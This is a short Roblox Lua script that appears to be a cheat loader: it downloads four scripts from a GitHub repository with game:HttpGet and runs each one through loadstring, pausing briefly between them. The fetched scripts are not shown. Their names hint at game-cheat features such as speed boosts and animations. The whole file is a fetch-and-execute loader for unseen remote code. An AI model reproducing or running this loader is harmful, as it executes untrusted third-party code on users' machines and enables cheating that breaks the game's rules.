loadstring(game:HttpGet("https://raw.githubusercontent.com/RBXHunter/fdfdsfggsfdsaa/refs/heads/main/1sposobka"))()       
wait(.2)
loadstring(game:HttpGet("https://raw.githubusercontent.com/RBXHunter/fdfdsfggsfdsaa/refs/heads/main/2sposobka"))()       
wait(.2)
loadstring(game:HttpGet("https://raw.githubusercontent.com/RBXHunter/fdfdsfggsfdsaa/refs/heads/main/Runbost"))()       
wait(.2)
loadstring(game:HttpGet("https://raw.githubusercontent.com/RBXHunter/fdfdsfggsfdsaa/refs/heads/main/anims"))()       
